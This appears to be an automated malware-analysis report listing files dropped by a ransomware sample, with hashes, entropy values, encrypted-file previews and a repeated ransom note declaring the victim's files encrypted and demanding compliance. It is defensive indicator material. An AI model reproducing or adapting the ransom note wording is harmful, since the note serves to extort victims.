                            Preview:HS...&D..|.k.Y........h{I..3......r%..k~|.`.s..P...q.z...V*#...^y.I.....-0j5m...%....o.[q..=W.U?&K>....j.~W...kO/..'C}........k.Ou.hj.}....I.MA~/.{.....V..d.:C.....h.8..t..%.%......:..k.I,.[.......HMf#2X.s.-*R...l27......*3.A...h.ie..Y.O......G..(...[i....6...'.e......A{./=0Q..R.h.9/.&...4.M.o....z1.fH.....#....v.....=...Zz.....&:..T..w.F.u.p.jC4..C.".L..J.5.:.)....5.....v......, ....E....G..Q..E.....tRx-se.....K0|.;e...v)).K.+...o.4 ..a.@|..?@........oL6.....<...!q..!.^..R.?R..........e.g.}.U.U..[Z...[.9..;.....WY...ei...O.#..~,.....R.S......y...j<..\B....X.l.....Y>$...>.v...z.o#....-.!.......*hske...|.Q...j.%5.{i..B..'"!.[j.A..4K4.aY.3._;..[.J0e.g..........S. +..%.}.W..l2.n.P.0...@<......"/.#.9...(`..8+}%....&:...8;..u.>...h&........rn1......Q.;..[.bpCz\?..M.5.p;P.tE<..i..*.qyq..N..e.g.....R...... tb.9Z....V.....6F..?]....3b.mp......y..ic:....J23Z...?k..:'.!.)......_-...K..S...E..zz.W...-.).%.:..GZ`p...\%......B'+...=*u..v.0@[..{...^...L..Q.=
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.842410696626892
                            Encrypted:false
                            SSDEEP:24:WNCLatVmIf6zWby1zcax4nUbsVjcB89vDagYS3SDUHjolGiQacm8tX:yCLar3CzWe1zcaicsKB4vDagAlhQ64X
                            MD5:E45837A84BF35895B166FE2581D83BCD
                            SHA1:B5BAAF0840AC1ACE010F5E831F893421F83C4961
                            SHA-256:23DC9E4BCC7CE70296570DA5AE03BBC8A94475EB18269E74045E6AE8890B88C7
                            SHA-512:AF69257CC9BB5322FCD62C3433A3E5A4C38002915ECCBBDDD91DD46AF1389E4F66838BFCE7F9CAF5AE276E4B835540A1D6CE7E3794AA4B8F8B31CD975E252BAE
                            Malicious:false
                            Preview:D.>.{.......I-..!zF.0...L_...j].%._7...b.&.9c.7._..n.._<<^W..A-<S..i..aVC..,.^..pM.3..!..k..wk.Y...nvh..@k.mX.V/#&..q.x&$....f.I%..1...d-.vL&mm.&U..`..nl...S....}.`.r.$NHc...(c..4...@o.x...f..F8r...f]".S.m.O.6C....X,..+....*..g..Z.b.V..&../][.{..T.......W..5.J.1.......O..W.L..*y..:r..\B....'.q....I. V}.rf].Y5._..OV....{.....G.C(m6..WV.*WY.fJ......l.".,32210V.5O].....GJ.+.....TFy..H.[^.y...J(....M.F.....|4.A_...H4.....rh.tU....,!....j...U.D.....4...m3.yw..[...F.j..0.e`..x......i.x-'v........n..~.8.wu.1t....g.......s....L..k__..:.........*i..B&....cS. .j..cJ.p.f7..r..J.(..@.~Urr_h}?.d.... u`.@...F{....XM....i.jTP.....K#..%........Itf{.G......E.U.."..;....Z...AZ.6.KY.O.&*._q....A8...Y...^E...t]..m..n`:X.=...g....@.2...,6@.$....Bt....3Gz...2.;/.j.T..s...F....s...U..*R8........H.U.#u2. ..X}s....*W/g[....g...4Tz.h.g....R...*.[h.+......M.kP...)..Z~.b..-..@....x.)...Q.o%.-p.&..>..V..d.t%+z.\...Nw..c...;PF .8...t.............i.T.Zm..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.872058785040627
                            Encrypted:false
                            SSDEEP:24:XEch9824hAf7rUhtABOfz40uYun1S8Y5dNBZP16etW8W6OIIYtpdlGiQacmDPN:UCihAf/UTABgyYuNYHNBZYUW8YYtpdl5
                            MD5:21E2F37FC05A07038D523517D03256D5
                            SHA1:39C78950EFE566A668C3E107BAFE491785AE51F4
                            SHA-256:95A73CA964F4F5F5E1649671DC4654941CCD6E3C92C8DB4567A5D584FF651EF2
                            SHA-512:CA6178D1E4F86D4AFFC29870D1DFD3FDCDCAD1F8EB6B42AB8B18E9A3C316B330AC22D7CE0DFA80618EE639EB542A18AF8E64762CF9CF446CEA27B51CD1C6D054
                            Malicious:false
                            Preview:..K.A..X..=....|......?^..a.....$ {.:o......"k..l...Z>...-j.6.i.;"7h.=.%...1l..<.........._..............M..QD..K2...y...{....KB6..-r...@........aSj.|...R%y...h.#.F.6..46./_......Qv.g....4.7.~.J@1yS..<&.S....`...k..(:h_.E...A..)..>.........M.mE....R....T#..N..#.b..8....l.......;<....u.=.n.....nT.q..&....s,....>..k...V.]..W.WS.".ok.,'6...g..!7.i....aU6.....#..Cc.. ...[t\.E..q.Cs.`(.u..>@z.W....-[.^.....(<.P.8..~)6..B.`.t...h.{...3...I....@..#.f..B.&...@:>..f..D..p..l..d8...P.I*....D=x.M.....t.e.g...c.......W....F.2...8..W....G......A.(<.3.....".?.w8...*.".......@).j...^=$.`....!.I....G~y..F\..n&.D!.".^..../Zte.j..O.....fk.J.E...+..N...r.Mi.l|.u...q....K...@..6,...r..9=P.v|A..z............9h.N...\n.z..YQ.Mx.O.t..:.)<...--Y..T.563x...6.V....!....R~.....J.l."Z.M.Z.rm..S...P...W$....\.AO.7..O.e......j[..q."..X/#i....w..l...>.J.2t_.%v.S.}^..m...;.b....1..A..L...3.h........3.CO...M...r.Lu!f...E..:V...L.<...@}.Ydz.f...4v...#...-..6t.h......7...
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.86744426854912
                            Encrypted:false
                            SSDEEP:24:NeKueGDqokCZVS0Ry10vF5ptB8Ctc1DSBdMe/8dXJuMJPMC5lGiQacmR3:BGDqozZV+0vFjF21k8lh5MC5lhQ69
                            MD5:08EA168EB6D20711ED928A1CB27E3F9F
                            SHA1:166846B0F3395CE98E4E8537A7E07A8B680CA7DB
                            SHA-256:0CCA40F7162CC767303B7966541BA9481A8E97429B254198722D2B30AF1B3420
                            SHA-512:CB90E67505E964B29354CA4E83D0C0B26AFC0F0FE46111225842A067FB324E5E200587009DF95C67A2DD851B228817165BF300DFA82B9B0274B7CBA016919CB4
                            Malicious:false
                            Preview:..}Y*d.*...7$B!kM<.......${.".!_.O.oy.X...#.../J.aeh.Q..YO..J.....e...=...z2.F +Yd$).?K}g...B......Q..'.K0.8....x.Qi........j.v.s.]...N..Dx..P.k..[._|.t.b.X>..{....[S..E@.`.A&.gA.CA.vNj..!..|}..&.sO..= .%#..3..:....W.....nm.5...|^~&h...{~{.xi...}..w#.....y `&Qr...<.l.}......Yj...1vM.0...Ed'...2,2`...?...,..8=_)Z.y.....e.+o......'..F7V.I........6w.....c.....0.W...C....f..6R....|..}k...k?t;.6Vd...a..(b../"..~...JN..p.\.8f. .\.........((..w..].v..\..(A;~..N...>E...,.y"..[.B...k...r"....jOF1..6..8.......o25...]8.....:....Y..<.l0./..!...F.Z.&.`......:}^_8.......B.4n3.<...K.eA...E;....SgP...h.....V6{...,...J..n.........).j..-..RN.{.=T..B\....AdD F.}.3c.....`.o...y"`8.......<....~S....../...+T..."?{...$......OH..`..-.x.1.j...Gc^!.a...t$.M(ma.w.).k".P#.g.:.......~.".hHw.....v^j.G.d.z.}.E #.M..!..&......*.}..S]..t.N..N`.~...S........./h.C....R..s(V.g.-CX.w.S..=rt.&+....4.I.C\pf%.UG.R......'.....s.....v@.].::gR'.....S....K....6.HV.?h...i.@&...E.Z..L.~s].
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.85560938781733
                            Encrypted:false
                            SSDEEP:24:VcM81qMG2qZvtA51sbf3KYs5W8QaX+fXEd9a+7EYlI3EQHlGiQacm4KZOjvO:VcMYR/q1tAErhs5QaX+fXA97Eg2lhQ6N
                            MD5:51D84B4216D482BAF2C1447C77B588A5
                            SHA1:23033C6E91672394D5F809AD25E3D5C5A1044073
                            SHA-256:907CC5539955DC8427E728FF4341677E6A8D205217F6522EF7AA04281FA0A040
                            SHA-512:DF605EF09A4729E8EE943EE46B5C8228C1234FA0AB6185AF694E72547132AC7D29C5C5A5C535E255FDC72110A799FFFAD23A06EC7381783DB0FCA3B7D1FCA1D5
                            Malicious:false
                            Preview:OjJn..R...=?.8.....P.'=>9.....h.9Z..X.%...XP.6A.GE.....f..:U....i..,]k,O.t..6.,;...q.....x....u.xS...2..K.Y.V.V.U4..v..$M...%.h..b.g....X.M.......I..0J...2^ .~.(K|.B...v.!....".../.@n.....<..>v.m....x.......z.XS..........7^.q.......{@.=3u./.....q_wM....<..[`y1....n._.r......}K"....$.P.>..K..y.e...!:..?...*.{.}.%..o....J"1.Z.....@..e..d^...G.J..\.}........g.w..aR..9..N...p.#Z.Y;?.~.w{Y..V..7..A.p.,C...uI..q...Lb.aMc.T?..o..z...IdHj:....6C..2....#CN..KR.[6X..Xk-.B..f..T...`G.c.yx...o.$!h.......s...(\.....N#....&.)..?..^,.8=8..&J.~3......5x..2J!....8.....y..4...-...:F.$Y..RQ.I.7.'.f..\..J.....>..Dj..I..M..%.Xq./_y.M['y.Wv.3.....4.F..Y.,_.85.>..B...|..4.|...X*.f?..F^ck.>w.%/8..D..a..bB.J..).r.MU.3....T.....i1......ZL.......f..u'/..q.-w.G'..=....M.R.<Pt...j.%.hq*.].qie.....+...T.....,.m.../.....is...V.......e.......Z.q.)$M.jh."fV.x4.G>..r...##.........Q.H..E.:.x..9!m...M.#.....`m.rK..I/..~M.....(...B3{....m..U...c.Z|..@Ai..B.....A.{...`|.K....[5....a.\
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.844339630053401
                            Encrypted:false
                            SSDEEP:24:Uo7M4za9hfedcn1Zr3EzMd3mq6IbgLJ/nbL4bemaSXtaxiaoVWqRUulGiQacmn//:Uo7M4zaHe2ngJ3Iby/AbeCyo3RBlhQ6X
                            MD5:FEA7446D904A4DFDCE68C3FEAD8302F9
                            SHA1:3A3B48854CAC91A3DE78435B0FA5F0D56EF2619E
                            SHA-256:35A4790DDB911E3B34126DA708225D7449FED36EF71FD8435748FE374FE92B71
                            SHA-512:2F47E8B4002BF367C1D84BBCAD7B392FF7D11B4D75D53E609A6C4D1AFED99A84179B95324EF7B961B9DC4A6FF89508BD8A85747946BB296AD2E7C65ABDC4561E
                            Malicious:false
                            Preview:..AqC.....c.8lZ;..O..Ox..CK .Y)&.y....7.....g..Mp.<N.Vf].\........^.......Yr&.C@.'.#.4.we.sw.K..q..Z.../"..E.1_...M2.-...F.jRf;...El.T....q..b'.$h.|.{....Y...I}.^k)j.>O?.R...i.U...(.'<3.E*...:^.vJW....Y..R.C......wb~8..'._|..Y.E...G...8...C....`.+.j..(.}s...k.~m.6.{.{..G.t......~...z....*...Z.&g<.E.O....bD?...Y."...p.\....<g...".......j..&.WR.....[.6.@8UlH.:.- .0m{..Q....=...~@#.B..&....|i.......V=.x;.W..6... ....Q......{..S...L.>..ub..."W.3.u|%....@.....;.o,...G..4r....go.l.+`..^.....r.@.+.I<.Y.........t...E!.w..A.'..xV.Y..z.............lM..).yX.H..hPE....B........s......ES1....i.,K....\\m&.^.a.dnk#......p.;;.....j.N.A.X....xv..T..5.i.....f../'.:.,...].P0....B4.N....g.,y...1....i..L.'.S...:.4.O...Po...X..tj.JZ.0....W......c.`..^p>N.G...<E.....o..!.~.<pr..G.I.]......+.P.............5..(._..........s..P..>.z..kI.0<...r.......$@ ..A....h.?T.f.}..~qJ.71..|.`>:xu.6ycL...@..yv....4.I`..?..,g><V...U..@...L[.U'.i...I..>a.-;->.E..,.....=......A....\*.!7.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.860161365401003
                            Encrypted:false
                            SSDEEP:24:4bYjCtMtVBue4nU6Oj+Dw+QzOPu7ndz3wD+OtuIcWErNlGiQacmyW7A:onMLBue4nU6OC2J7NOcWErNlhQ62
                            MD5:DACDA7FA5D024F408FE7F781DE647CD8
                            SHA1:EB0F2CF8B3458691F93F6838953886EB16E3DA0E
                            SHA-256:F76BC64A8C2D7E78D9C286977C626E13A16E79F9D47AC1B0D83DD922B6E36E80
                            SHA-512:691A5149F872ABB41202A4AE11B6F8036E0B6B5FEAA3B92370E20CC66AFF9C6F9FAF52449E66B7A16EEC8E1CA3A25E6E24139EA0CB592945D0C9AFF4CA26973B
                            Malicious:false
                            Preview:n. .....*.6.3....v...W..u.To.;....y..H.....c...M...../..X.._./c..7uxr9YZ.../........]...1H.s/...S.(..v.0.O...e~0o.[O}.a.5..l..kGh.v>A..i....u`.:...9.5..nY...B..[C..:~W..0.H.........:.[N!...{5 <x..s......,|).....g......c/..wb..^..CC..q\.....g.Q ..,i|/l.ka...&..Q@v......S.F5.k.7..o=.`D....{.:W.........{+{1.&.|..A...H.CMT+)....1...R...F....8........UVP<...hr.....`U.0&.~..0...-x.A...Q.1.&.g.|Tf.q.F.......4.._0.n$.hQ.!.'....K.<.......>:G.'.9...6[tb%........k...wKOT.%$.[..8H.y8..U.W..=...?`...R7.....D.....B;.........l..g...8.0.5.<M..Y.@^.N........v*..R....W.....?-.8W}.|..o3|...,........i.'.ck...5.N....p.].Z...O.i/.cS.....T..u.b.9.>..h1P.YN.G.....j.."y....8.%.......u.iM..V.s"....|0.;S$.......#...0j..;....|lF.....l...L......T.P.I@.".....y...e.p..=2.H...P?%e...L.......@.N..t.@:c.z.o.}.:GS..v..{7..w.P!.s..9...X.`.hu<.G.L,.lO..t..T..@[@...W.B.)......4D..=..sN..b../3.....D....p_c.5..........v.2.U.3................9K'......f.......V..*.>(.......~..!H2..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.8758871122738405
                            Encrypted:false
                            SSDEEP:24:fsG+a471Y7S5TMZdX5jlMQPMvZ/30Vnd8b4sg/9ko5ElGiQacmt4l:fx+3+gTMZdllMQEh/E8jg/9dElhQ6y
                            MD5:706D20F52B71D8CF595C8F5F4AF11676
                            SHA1:70D8F3347556E8287BDCEF9C987E01D5106975A0
                            SHA-256:E9F094C0A766E6595531543DBD90C7FF0E8DE90294F21BA385E0429422C7B84F
                            SHA-512:69AC89BC59317972681C242918977C90A3F855C055FBEBAA73D1CA7C10C55429A97BAB784DC2BA8BBFD92A11959D8DA60238A47F34C6CA863E39A161213A28C9
                            Malicious:false
                            Preview:.?.d..A=b<.R..CP...Y....)Vv4:h.d...j.....o(..B*..h%.06hF.p.....PV...H6$D....#.y.nU0..v...e...... ..........3._yq.i..:.`..v..........1.....E.Rj..u.g...@>} .7.Zx.v.t.-f-...4w...Z......x..2QM.......*9."..:..p...Z......}......",?..6.7.y..`L.b.&...-..2o....W..B~..?.....&.%..".5.Y..?N..z..W%..#....G...r.}..y.d...b..A....O.d..._.8{.)..-..r..I.b{H.e.w29....n.:T...o..t<\|..!YUmh.}. ..'Z../.J.......uL..8fh.'9.........F...j;./...C.VHZ......~..#...a....Q......NX2..7/1A..&.J.G}Z....(3[.[..xb7.zO..y.Ft:L"*.-t......6..w=:.g....!>......y...mM.i......Mpg.1...D.:.^.J.S..Go...H.......Y. Rc!^v.D......U.TL...i..#+.K..+#..chL\.\..0.M..jki..R....O.t.f...E..T4]&H.!$.p../;.*O0.C...9..my .d./..?...."*...IQ,L..i..b6..`L....#....@^M..s.0.K.B...30....O...|3Z1...N *9..5....z.)T.u...K4...2..(...Y.\.c.M......l.O.. .4....R....."...R..`.......7.t.4f.se..5*Z..$...>.[.. .... .s9...&"..YK..5..-...:.A".._9C....u....J...M@@..%C=.hr;....Ku....$....\.b.B..}.J5.^@zU.7)BL..mD.@.9.S,g..X
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:OpenPGP Secret Key
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.857915906800261
                            Encrypted:false
                            SSDEEP:24:r/gtmjAl1iNnhw+GsM7T2K59Gr81XuT6MNulR98mmlGiQacmLU:bB0l1YnfkT2K5p1+eMw/rmlhQ6LU
                            MD5:BA593FA2E877B023D51BD2C56AB48255
                            SHA1:A7F586950A95EE7B4EE720E1A172AEE59684B279
                            SHA-256:EFC43629C7D8322298187B28E1900CE7808A7066AA33A2E4B8C0416AAA6D982F
                            SHA-512:7C0897734F463267AAD6A6E282ABCF5B22CD16B13F30C5DBC456717748C4572F6780F8E066462143374778A7C39130CD956D036FE9949F884B166A83EB84DB4B
                            Malicious:false
                            Preview:.^.^.(..$*.Id..5b.....p.;...7F.L.......-....Q.s`.a..4'.....E.&.h.Q:\..,5..P........_.....m...G.Y./..wqp...v..t.zYP.=..r..A$..k`t...]Z.:........I.[....#....'.....f-.......7..0.!+...39?.T.. KJ....%.9M.C...xDx.1U$8..Y.a.D..!.=d=.`n.Yc(..1.=.M3..qZ.].7..t}..]..5A...*U..G;p...........|...:..|._.O.(.......k8.N^E...]4.9.D.#/#....ga.Ejc..?...-...m.W..G.k._...!&=...".Y8..>..|..9.....K..Y.J.|Q.>..o.o..r.2.A..)a.A>.;.....gE.F9........4>2j.......2k.2........[]m}..|.R..........O..}....s.4h.8D.M...Y...........J<..j...].....e..2S2...P..-..z..Gl.....o.....&0.|'<M..._.{4<tk.v.s^..$..<%.{...A........H.(dF..}.C..K.......KB.H....p.HT.U..m.v.....}.d....{.t.V.p.H.L.\$m.Yp.Q^D4C.`...i..QLh...}fuA..+..o.W!i..6.1......p..b...N.V.........g........~......_....Pk,...dA.."....."..1u...x2>:|^....O.;&q............0K[x...#.|.2./..k...........s....~."....-..,u8...5.?.V]8vL.....86f.#4_.Js.3.0.I5....(...L)...6."|.j..6....vf%....-..9.K:A!....Y.v.B..~MV..Xi.f...h.7.e ..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.834660822201336
                            Encrypted:false
                            SSDEEP:24:CaUqla2o+PgvbZDTreIODuPXjEpGRnB7xNHOybOE5r3w0agH5wmlGiQacm31:CxqlxgvtnPODkTEe1MyaoFh5lhQ6l
                            MD5:B384C01952AE2D3B37681847D9367050
                            SHA1:1CF82336561B6888D9DDF346404E565EB5F44020
                            SHA-256:3835E1772017A30B5FB3FE31416D605BB664796104334CB5AD23244C8DA35C7D
                            SHA-512:EB31698B34D24F4EA9B18FC570B710C8100659EAFD680A6843DCC2B83F47B01845AA68464275BDD658EE1978E45CF410F22F0EC5596FF13C167F9A211D11173A
                            Malicious:false
                            Preview:.$.(k.c...._..>s[z/..;#.....;.'.........gJ......<%\.V.d..-~.A..\S!=....C.n:E...@..d..m..A.O......1...Z.DH..:3.b.........e.,.b..3..k5.......2..ZG.7...f...-."..N,..U.DH#....G..r8S... n..........L:Ex....$1.v[.r...|...!O..4....-.'..v%..B.u.2'e]GAW....`t.....|Sv.>....k.-]RN........}G...QH...q..R$........k...;'....`/...pP........%z.ve.2...s.."..Ae.l..KO..QN......R...WD.k....g....r.... I.)...M../..0.N...Y~Hb .'x...s....X...v.4^6.[.v.R...p......}......|:..2LK...E....).f'W.R..q.......g.....5.U...3..gv...1{.K.b. ....v.sr.0.R"S....I..h."z.tu.U.p<......G..F<..DJ"...$=B,.^d.k. ..?d7=K.c......B...6.`z..../.5'..I?..{2......M.g.....%.k.V.)q2.8.d..!N#}Q2!.........N.".f.a.-.|gu.3.....~..6/6.5...y......d..O.6..K5.=...../...I....p...Q......:.M....(<&..$u...A.....u..a.g_|r..&=.-..K..y.LbI..... .......=sY.U..4\.[..~.....}F.......6.......< ..w..~g56L.R........y}...b^.601N.....o....D.....}*.Z..Ya..4x...}..y}d..R.U$...h.jMJ\..N.....\9...U.wt?..hR.;J(.u.3i6T.....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.831002648847592
                            Encrypted:false
                            SSDEEP:24:wTk3XMzmfaWypejdem3mn7CX9uUnk0D4auOKslK+lGiQacmuwv:wcczmnypueQUUv+OKslHlhQ6uwv
                            MD5:DEB1DBCFD7E55BECC86E4A906322E4C4
                            SHA1:9FE9E1ADF5BCF8C1816EE2A20A59D5A3B616A12B
                            SHA-256:E9B926E6421BF2DE1ADF1BF9E10482EFB8C89562755C0ED5EF8C5DEDDCBD2406
                            SHA-512:3923ABF96AC1C132AD63A8D663F7B19D1154DB5368D544B0FFDBB8F91CED4C0BB9C088FF8A0B9BC563178A4CEEF7DF70EFE844777C605D822E2AE6517B1362ED
                            Malicious:false
                            Preview:d..?A...8|2...A..a.]g.........N1...F..}~.`....._.v..n7..7....(h..(....HuA'Q...B....h....vL....|.K...^:..k..G.7D). ..={.E......._.{gT:.b..-....=w...M.r}'Y.w...&..a">P....yzc-..8....g..x..-.Y..d...............C...b.4P..'..`.L.D...D.&[.....:._..n|......./2..;..Z.a.....W..`&i.....$......Z..(^g.-......{.Z.....W.."...=}4?.:bc.8....{.c|..r..Z).XXU/1..].."..QM.....V..`;.H..M..vU.M..I..Y.....E.*..J.n.....Yu..i.&.!-.....J..).n..(....Q.^YTX.....nK.....B6.h..~.^.F..[...+v..>.3."g}t.H..y2Tm.s......U.hV.f<.....s.Syq...4.}.&......>...9...$&=........A..=4....Y....{0#...m.....l.P'...L.ea&..l.e;....{....t?......t..G.....`...D.......6....%..%.g..jW%J. ....T.Ibk8..2\.... J.?.).V.Is..g..dY..".3.@TNC!......Z......j.........f.....t...;.y.b...T.......G/...Ox..;...{...I.|...ZM...c.YJC..PG..d.;......0..Wn...[.CC...".....x0.."z$.(\..*....z...G..2W/.\....&.6........W..o&?#U..l.=r:r....A+.'...S.]...;eW6..W...a...3.Y...Qge}-..Z?...z4.?..4...l.:^..6....VZ../|...H
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
